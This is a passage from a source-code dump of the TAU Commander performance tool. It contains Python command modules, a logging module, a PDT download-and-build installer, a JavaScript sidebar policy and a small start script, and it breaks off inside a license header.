modules\nimport tau\nimport logger\nimport arguments as args\nimport environment as env\nfrom model.measurement import Measurement\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"List measurement configurations or show configuration details.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s [measurement_name] [measurement_name] ... [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [(('names',), {'help': \"If given, show details for the measurement with this name\",\n 'metavar': 'measurement_name', \n 'nargs': '*',\n 'default': args.SUPPRESS}),\n (('-l','--long'), {'help': \"Display all information about the measurement\",\n 'action': 'store_true',\n 'default': False})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n try:\n names = args.names\n except AttributeError:\n found = Measurement.all()\n else:\n found = []\n for name in names:\n t = Measurement.withName(name)\n if t:\n found.append(t)\n else:\n PARSER.error(\"No measurement configuration named '%s'\" % name)\n\n title = '{:=<{}}'.format('== Measurements (%s) ==' % env.USER_PREFIX, \n logger.LINE_WIDTH)\n if not found:\n listing = \"No measurements. See 'tau measurement create --help'\"\n else:\n yesno = lambda x: 'Yes' if x else 'No'\n table = Texttable(logger.LINE_WIDTH)\n cols = [('Name', 'r', lambda t: t['name']), \n ('Profile', 'c', lambda t: yesno(t['profile'])), \n ('Trace', 'c', lambda t: yesno(t['trace'])), \n ('Sample', 'c', lambda t: yesno(t['sample'])),\n ('Source Inst.', 'c', lambda t: yesno(t['source_inst'])),\n ('Compiler Inst.', 'c', lambda t: t['compiler_inst']),\n ('MPI', 'c', lambda t: yesno(t['mpi'])),\n ('OpenMP', 'c', lambda t: t['openmp']),\n ('Callpath Depth', 'c', lambda t: t['callpath']),\n ('Mem. Usage', 'c', lambda t: yesno(t['memory_usage'])),\n ('Mem. Alloc', 'c', lambda t: yesno(t['memory_alloc'])),\n ('In Projects', 'l', None)]\n headers = [header for header, _, _ in cols]\n rows = [headers]\n if args.long:\n parts = []\n for t in found:\n populated = t.populate()\n parts.append(pformat(populated))\n listing = '\\n'.join(parts)\n else:\n for t in found:\n populated = t.populate()\n projects = ', '.join([p['name'] for p in populated['projects']])\n row = [fnc(populated) for _, _, fnc in cols if fnc] + [projects]\n rows.append(row)\n table.set_cols_align([align for _, align, _ in cols])\n table.add_rows(rows)\n listing = table.draw()\n \n LOGGER.info('\\n'.join([title, '', listing, '']))\n return tau.EXIT_SUCCESS\n" }, { "alpha_fraction": 0.6127451062202454, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 11, "blob_id": "2784af68e5f03fe4cb5ee8f6d5350b0ff2e6742c", "content_id": "20e48491e25d95b428221650deb1b1166113a972", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 204, "license_type": "permissive", "max_line_length": 47, "num_lines": 17, "path": "/commander/README.md", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "# TAU Commander\n\n## Requirements\n\n * [Node.js >0.10](http://nodejs.org/)\n\n## Quick Start\n\n```\nnpm install\n./bin/start.sh\n```\nNavigate to `http://localhost:1337/` and enjoy.\n\n## License\n\nSee LICENSE file.\n" }, { "alpha_fraction": 0.6215277910232544, "alphanum_fraction": 0.6238425970077515, "avg_line_length": 35, "blob_id": "46fd2bf843f674ad15b1d89cb7e6c495092f4c90", "content_id": "b6e57e95220f049d60bb04747a91fb9fa590ea48", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 864, "license_type": "permissive", "max_line_length": 82, "num_lines": 24, "path": "/commander/api/policies/sidebar.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n * sidebar\n *\n * @module :: Policy\n * @description :: Provides sidebar items\n * @docs :: http://sailsjs.org/#!documentation/policies\n *\n */\nmodule.exports = function(req, res, next) {\n var sidebar_items = [\n {title: 'Dashboard', href: '/dashboard', icon: 'glyphicon-th-large'},\n {title: 'Projects', href: '/project', icon: 'glyphicon-ok-circle'},\n {title: 'Applications', href: '/application', icon: 'glyphicon-modal-window'},\n {title: 'Targets', href: '/target', icon: 'glyphicon-screenshot'},\n {title: 'Measurements', href: '/measurement', icon: 'glyphicon-stats'},\n {title: 'Help', href: '/help', icon: 'glyphicon-question-sign'},\n ];\n\n for (i=0; i<sidebar_items.length; i++) {\n sidebar_items[i].active = (req.path.indexOf(sidebar_items[i].href) == 0);\n }\n res.locals.sidebar_items = sidebar_items;\n return next();\n};\n" }, { "alpha_fraction": 0.6632256507873535, "alphanum_fraction": 0.6697948575019836, "avg_line_length": 31.290042877197266, "blob_id": "79a4c431873f86bc8b854038136ce6e95b16c3cb", "content_id": "9f59b334a01276f48f69e7b266a1246a054e6627", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7459, "license_type": "permissive", "max_line_length": 102, "num_lines": 231, "path": "/packages/tau/logger.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2015, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport errno\nimport logging\nimport textwrap\nimport contextlib\nimport socket\nimport platform\nfrom datetime import datetime\nfrom logging import handlers\n\n# TAU modules\nimport environment\n\ndef getTerminalSize():\n import platform\n current_os = platform.system()\n tuple_xy=None\n if current_os == 'Windows':\n tuple_xy = _getTerminalSize_windows()\n if tuple_xy is None:\n tuple_xy = _getTerminalSize_tput()\n # needed for window's python in cygwin's xterm!\n if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):\n tuple_xy = _getTerminalSize_linux()\n if tuple_xy is None:\n tuple_xy = (80, 25) # default value\n return tuple_xy\n\ndef _getTerminalSize_windows():\n res=None\n try:\n from ctypes import windll, create_string_buffer\n # stdin handle is -10, stdout -11, stderr -12\n h = windll.kernel32.GetStdHandle(-12)\n csbi = create_string_buffer(22)\n res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)\n except:\n return None\n if res:\n import struct\n (bufx, bufy, curx, cury, wattr,\n left, top, right, bottom, maxx, maxy) = struct.unpack(\"hhhhHhhhhhh\", csbi.raw)\n sizex = right - left + 1\n sizey = bottom - top + 1\n return sizex, sizey\n else:\n return None\n\ndef _getTerminalSize_tput():\n # get terminal width\n # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window\n try:\n import subprocess\n proc=subprocess.Popen([\"tput\", \"cols\"],stdin=subprocess.PIPE,stdout=subprocess.PIPE)\n output=proc.communicate(input=None)\n cols=int(output[0])\n proc=subprocess.Popen([\"tput\", \"lines\"],stdin=subprocess.PIPE,stdout=subprocess.PIPE)\n output=proc.communicate(input=None)\n rows=int(output[0])\n return (cols,rows)\n except:\n return None\n\ndef _getTerminalSize_linux():\n def ioctl_GWINSZ(fd):\n try:\n import fcntl, termios, struct, os\n cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,'1234'))\n except:\n return None\n return cr\n cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)\n if not cr:\n try:\n fd = os.open(os.ctermid(), os.O_RDONLY)\n cr = ioctl_GWINSZ(fd)\n os.close(fd)\n except:\n pass\n if not cr:\n try:\n cr = (env['LINES'], env['COLUMNS'])\n except:\n return None\n return int(cr[1]), int(cr[0])\n\ndef _textwrap_message(record):\n return ['%s%s' % (LINE_MARKER, _text_wrapper.fill(line))\n for line in record.getMessage().split('\\n')]\n\n\ndef _msgbox(record, marker):\n width = LINE_WIDTH - len(LINE_MARKER)\n hline = LINE_MARKER + marker*width\n parts = [hline, LINE_MARKER, '%s%s' % (LINE_MARKER, record.levelname)]\n parts.extend(_textwrap_message(record))\n parts.append(hline)\n return '\\n'.join(parts)\n\n\nclass LogFormatter(logging.Formatter, object):\n \"\"\"\n Custom log message formatter.\n \"\"\"\n\n def __init__(self):\n super(LogFormatter, self).__init__()\n\n def format(self, record):\n if record.levelno == logging.CRITICAL:\n return _msgbox(record, '!')\n elif record.levelno == logging.ERROR:\n return _msgbox(record, '!')\n elif record.levelno == logging.WARNING:\n return _msgbox(record, '*')\n elif record.levelno == logging.INFO:\n return '\\n'.join(_textwrap_message(record))\n elif record.levelno == logging.DEBUG:\n return '%s%s:%s: %s' % (LINE_MARKER, record.levelname, \n record.name, record.getMessage()) \n else:\n raise RuntimeError('Unknown record level (name: %s)' % record.levelname)\n\ndef getLogger(name):\n \"\"\"\n Returns a customized logging object by name\n \"\"\"\n return logging.getLogger('tau.' + name)\n\ndef setLogLevel(level):\n \"\"\"\n Sets the output level for all logging objects\n \"\"\"\n global LOG_LEVEL\n LOG_LEVEL = level.upper()\n stdout_handler.setLevel(LOG_LEVEL)\n\nLOG_LEVEL = 'INFO'\n\nLOG_FILE = os.path.join(environment.USER_PREFIX, 'debug_log')\n\n# Marker for each line of output\nLINE_MARKER = os.environ.get('TAU_LINE_MARKER', '')\n\n# Terminal dimensions\nTERM_SIZE = getTerminalSize()\nLINE_WIDTH = TERM_SIZE[0] - len(LINE_MARKER)\n\n_text_wrapper = textwrap.TextWrapper(width=LINE_WIDTH, \n subsequent_indent=LINE_MARKER+' ',\n break_long_words=False,\n break_on_hyphens=False,\n drop_whitespace=False)\n\n_root_logger = logging.getLogger('tau')\nif not len(_root_logger.handlers):\n prefix = os.path.dirname(LOG_FILE)\n try:\n os.makedirs(prefix)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(prefix): pass\n else: raise\n file_handler = handlers.TimedRotatingFileHandler(LOG_FILE, when='D', interval=1, backupCount=5)\n file_handler.setFormatter(LogFormatter())\n file_handler.setLevel(logging.DEBUG)\n\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(LogFormatter())\n stdout_handler.setLevel(LOG_LEVEL)\n \n _root_logger.addHandler(file_handler)\n _root_logger.addHandler(stdout_handler)\n _root_logger.setLevel(logging.DEBUG) \n\n _root_logger.debug(\"\"\"\n%(bar)s\nTAU COMMANDER LOGGING INITIALIZED\n\nTimestamp : %(timestamp)s\nHostname : %(hostname)s\nPlatform : %(platform)s\nPython Version : %(pyversion)s\nWorking Directory : %(cwd)s\nTerminal Size : %(termsize)s\n%(bar)s\n\"\"\" % {'bar': '#'*LINE_WIDTH,\n 'timestamp': str(datetime.now()),\n 'hostname': socket.gethostname(), \n 'platform': platform.platform(), \n 'pyversion': platform.python_version(), \n 'cwd': os.getcwd(), \n 'termsize': 'x'.join(map(str, TERM_SIZE))})\n" }, { "alpha_fraction": 0.6043956279754639, "alphanum_fraction": 0.6098901033401489, "avg_line_length": 19.11111068725586, "blob_id": "e561dd29b1e5ad76654fa21a41b8a8fee2557a01", "content_id": "dcaec20fb4b9e113e5acce5edab27ca6089f737e", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 182, "license_type": "permissive", "max_line_length": 54, "num_lines": 9, "path": "/commander/bin/dev_start.sh", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "#!/bin/bash\nHERE=$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\n\ncd \"$HERE/..\"\nexport PATH=$PWD/node_modules/.bin:$PATH\n\nexport NODE_ENV=\"development\"\n#rm -rf .tmp\nsails lift $@\n\n" }, { "alpha_fraction": 0.5865488052368164, "alphanum_fraction": 0.5915661454200745, "avg_line_length": 33.28278732299805, "blob_id": "57c53ea4fd9430b3149b10bb1947cc69d90fbd46", "content_id": "0a1cabd199a6ead6d4f824e172314ce73c8a8ba0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8371, "license_type": "permissive", "max_line_length": 108, "num_lines": 244, "path": "/packages/tau/cf/pdt.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport shutil\nimport platform\n\n# TAU modules\nimport cf\nimport logger\nimport util\nimport error\nimport environment\n\n\nLOGGER = logger.getLogger(__name__)\n\nDEFAULT_SOURCE = {None: 'http://tau.uoregon.edu/pdt.tgz',\n # Why isn't this called pdt-x86_64.tgz ?? \"lite\" tells me nothing\n 'x86_64': 'http://tau.uoregon.edu/pdt_lite.tgz'}\n\nCOMMANDS = {None: ['cparse',\n 'cxxparse',\n 'edg33-upcparse',\n 'edg44-c-roseparse',\n 'edg44-cxx-roseparse',\n 'edg44-upcparse',\n 'edgcpfe',\n 'f90fe',\n 'f90parse',\n 'f95parse',\n 'gfparse',\n 'pdbcomment',\n 'pdbconv',\n 'pdbhtml',\n 'pdbmerge',\n 'pdbstmt',\n 'pdbtree',\n 'pdtf90disp',\n 'pdtflint',\n 'pebil.static',\n 'roseparse',\n 'smaqao',\n 'taucpdisp',\n 'tau_instrumentor',\n 'upcparse',\n 'xmlgen'],\n 'apple': ['cparse',\n 'cxxparse',\n 'edgcpfe',\n 'f90fe',\n 'f90parse',\n 'f95parse',\n 'gfparse',\n 'pdbcomment',\n 'pdbconv',\n 'pdbhtml',\n 'pdbmerge',\n 'pdbstmt',\n 'pdbtree',\n 'pdtf90disp',\n 'pdtflint',\n 'tau_instrumentor',\n 'taucpdisp',\n 'xmlgen'] \n}\n\n\nclass Pdt(object):\n \"\"\"\n Encapsulates a PDT installation\n \"\"\"\n def __init__(self, prefix, cxx, src, arch):\n self.src = src\n if src.lower() == 'download':\n try:\n self.src = DEFAULT_SOURCE[arch]\n except KeyError:\n self.src = DEFAULT_SOURCE[None]\n self.prefix = prefix\n self.cxx = cxx\n self.arch = arch\n if os.path.isdir(src):\n self.pdt_prefix = src\n else:\n compiler_prefix = str(cxx.eid) if cxx else 'unknown'\n self.pdt_prefix = os.path.join(prefix, 'pdt', compiler_prefix)\n self.src_prefix = os.path.join(prefix, 'src')\n self.include_path = os.path.join(self.pdt_prefix, 'include')\n self.arch_path = os.path.join(self.pdt_prefix, arch)\n self.bin_path = os.path.join(self.arch_path, 'bin')\n self.lib_path = os.path.join(self.arch_path, 'lib')\n\n def verify(self):\n \"\"\"\n Returns true if if there is a working PDT installation at `prefix` with a\n directory named `arch` containing `bin` and `lib` directories or \n raises a ConfigurationError describing why that installation is broken.\n \"\"\"\n LOGGER.debug(\"Checking PDT installation at '%s' targeting arch '%s'\" % (self.pdt_prefix, self.arch)) \n if not os.path.exists(self.pdt_prefix):\n raise error.ConfigurationError(\"'%s' does not exist\" % self.pdt_prefix)\n \n # Check for all commands\n try:\n commands = COMMANDS[self.arch]\n LOGGER.debug(\"Checking %s PDT commands\")\n except KeyError:\n commands = COMMANDS[None]\n LOGGER.debug(\"Checking default PDT commands\")\n for cmd in commands:\n path = os.path.join(self.bin_path, cmd)\n if not os.path.exists(path):\n raise error.ConfigurationError(\"'%s' is missing\" % path)\n if not os.access(path, os.X_OK):\n raise error.ConfigurationError(\"'%s' exists but is not executable\" % path)\n \n LOGGER.debug(\"PDT installation at '%s' is valid\" % self.pdt_prefix)\n return True\n\n def install(self, force_reinstall=False):\n \"\"\"\n TODO: Docs\n \"\"\"\n LOGGER.debug(\"Initializing PDT at '%s' from '%s' with arch=%s\" % \n (self.pdt_prefix, self.src, self.arch))\n \n # Check if the installation is already initialized\n if not force_reinstall:\n try:\n return self.verify()\n except error.ConfigurationError, err:\n LOGGER.debug(err)\n LOGGER.info('Starting PDT installation')\n\n # Download, unpack, or copy PDT source code\n dst = os.path.join(self.src_prefix, os.path.basename(self.src))\n try:\n util.download(self.src, dst)\n srcdir = util.extract(dst, self.src_prefix)\n except IOError as err:\n raise error.ConfigurationError(\"Cannot acquire source file '%s': %s\" % (self.src, err),\n \"Check that the file is accessable\")\n finally:\n try: os.remove(dst)\n except: pass\n\n if not self.cxx:\n compiler_flag = ''\n else:\n family_flags = {'system': '',\n 'GNU': '-GNU',\n 'Intel': '-icpc',\n 'PGI': '-pgCC'}\n try:\n compiler_flag = family_flags[self.cxx['family']]\n except KeyError:\n LOGGER.warning(\"PDT has no compiler flag for '%s'. Using defaults.\" % self.cxx['family'])\n\n try:\n # Configure\n prefix_flag = '-prefix=%s' % self.pdt_prefix\n cmd = ['./configure', prefix_flag, compiler_flag]\n LOGGER.info(\"Configuring PDT...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('PDT configure failed')\n\n # Build\n cmd = ['make', '-j4']\n LOGGER.info(\"Compiling PDT...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('PDT compilation failed.')\n\n # Install\n cmd = ['make', 'install']\n LOGGER.info(\"Installing PDT...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('PDT installation failed.')\n except:\n LOGGER.info(\"PDT installation failed, cleaning up\")\n shutil.rmtree(self.pdt_prefix, ignore_errors=True)\n finally:\n # Always clean up PDT source\n LOGGER.debug('Deleting %r' % srcdir)\n shutil.rmtree(srcdir, ignore_errors=True)\n \n # Verify the new installation\n try:\n retval = self.verify()\n LOGGER.info('PDT installation complete')\n except Exception as err:\n # Installation failed, clean up any failed install files\n #shutil.rmtree(self.pdt_prefix, ignore_errors=True)\n raise error.SoftwarePackageError('PDT installation failed: %s' % err)\n else:\n return retval\n\n def applyCompiletimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n env['PATH'] = os.pathsep.join([self.bin_path, env.get('PATH')])\n\n def getRuntimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n pass\n\n \n" }, { "alpha_fraction": 0.6622037291526794, "alphanum_fraction": 0.6640504598617554, "avg_line_length": 36.560691833496094, "blob_id": "c4be259f09ee4c2fab4c612fe93cddd99b9eaa9a", "content_id": "617f3a9265a7c1776248fee2fcb8eccdee00ca65", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6498, "license_type": "permissive", "max_line_length": 110, "num_lines": 173, "path": "/packages/tau/commands/target/create.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport logger\nimport commands\nimport controller\nimport error\nimport arguments as args\nfrom model.target import Target\nfrom model.compiler import Compiler, KNOWN_FAMILIES\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Create a new target configuration.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s <target_name> [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\nPARSER = args.getParserFromModel(Target,\n prog=COMMAND,\n usage=USAGE, \n description=SHORT_DESCRIPTION)\ngroup = PARSER.getGroup('compiler arguments')\ngroup.add_argument('--compilers',\n help=\"Select all compilers automatically from the given family\",\n metavar='<family>', \n dest='family',\n default=args.SUPPRESS,\n choices=KNOWN_FAMILIES.keys())\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\"\n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n try:\n family = KNOWN_FAMILIES[args.family]\n except AttributeError:\n # --compilers not specified but that's OK\n pass\n except KeyError:\n raise error.ConfigurationError(\"Invalid compiler family: %s\" % args.family,\n \"See 'compiler arguments' under `tau target create --help`\")\n else:\n LOGGER.debug(\"Using %s compilers by default\" % args.family)\n for comp_info in family:\n setattr(args, comp_info.role, comp_info.command)\n del args.family\n LOGGER.debug('Arguments: %s' % args)\n\n languages = {'CC': 'C', 'CXX': 'C++', 'FC': 'Fortran'}\n compiler_keys = set(languages.keys())\n all_keys = set(args.__dict__.keys())\n given_keys = compiler_keys & all_keys\n missing_keys = compiler_keys - given_keys\n compilers = {}\n \n LOGGER.debug(\"Given keys: %s\" % given_keys)\n LOGGER.debug(\"Missing keys: %s\" % missing_keys) \n \n if not missing_keys:\n LOGGER.debug(\"All compilers specified by user\")\n for key in compiler_keys:\n compilers[key] = Compiler.identify(getattr(args, key))\n elif not given_keys:\n LOGGER.debug(\"No compilers specified by user, using defaults\")\n for key in compiler_keys:\n comp = Compiler.identify(getattr(args, key))\n LOGGER.info(\"%s compiler not specified, using default: %s\" % \n (comp['language'], comp.absolutePath()))\n compilers[key] = comp\n else:\n LOGGER.debug(\"Some compilers specified by user, using compiler family defaults\")\n siblings = set()\n for key in given_keys:\n comp = Compiler.identify(getattr(args, key))\n siblings |= set(Compiler.getSiblings(comp))\n compilers[key] = comp\n for key in missing_keys:\n for comp in siblings:\n if comp['role'] == key:\n LOGGER.info(\"%s compiler not specified, using default: %s\" % \n (comp['language'], comp.absolutePath()))\n compilers[key] = comp\n\n # Check that all compilers were found\n for key in compiler_keys:\n if key not in compilers:\n raise error.ConfigurationError(\"%s compiler could not be found\" % languages[key], \n \"See 'compiler arguments' under `tau target create --help`\")\n \n # Check that all compilers are from the same compiler family \n # This is a TAU requirement. When this is fixed in TAU we can remove this check\n families = list(set([comp['family'] for comp in compilers.itervalues()]))\n if len(families) != 1:\n raise error.ConfigurationError(\"Compilers from different families specified\",\n \"TAU requires all compilers to be from the same family, e.g. GNU or Intel\")\n LOGGER.info(\"Using %s compilers\" % families[0])\n \n # Check that each compiler is in the right role\n for role, comp in compilers.iteritems():\n if comp['role'] != role:\n raise error.ConfigurationError(\"'%s' specified as %s compiler but it is a %s compiler\" % \n (comp.absolutePath(), languages[role], comp['language']),\n \"See 'compiler arguments' under `tau target create --help`\")\n \n # Show compilers to user\n for comp in compilers.itervalues():\n LOGGER.info(\" %s compiler: '%s'\" % (comp['language'], comp.absolutePath()))\n \n flags = dict(args.__dict__)\n for key, comp in compilers.iteritems():\n flags[key] = comp.eid\n try:\n Target.create(flags)\n except controller.UniqueAttributeError:\n PARSER.error('A target named %r already exists' % args.name) \n\n LOGGER.info('Created a new target named %r.' % args.name)\n return commands.executeCommand(['target', 'list'], [args.name])\n" }, { "alpha_fraction": 0.6360206007957458, "alphanum_fraction": 0.6368188261985779, "avg_line_length": 36.04570007324219, "blob_id": "82f4d88555de432d50f9da73bed1fa7f88fd49e8", "content_id": "f9636bac4191c291b760a1b50da92ddcf727e6e7", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13781, "license_type": "permissive", "max_line_length": 119, "num_lines": 372, "path": "/packages/tau/cf/scorep.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF 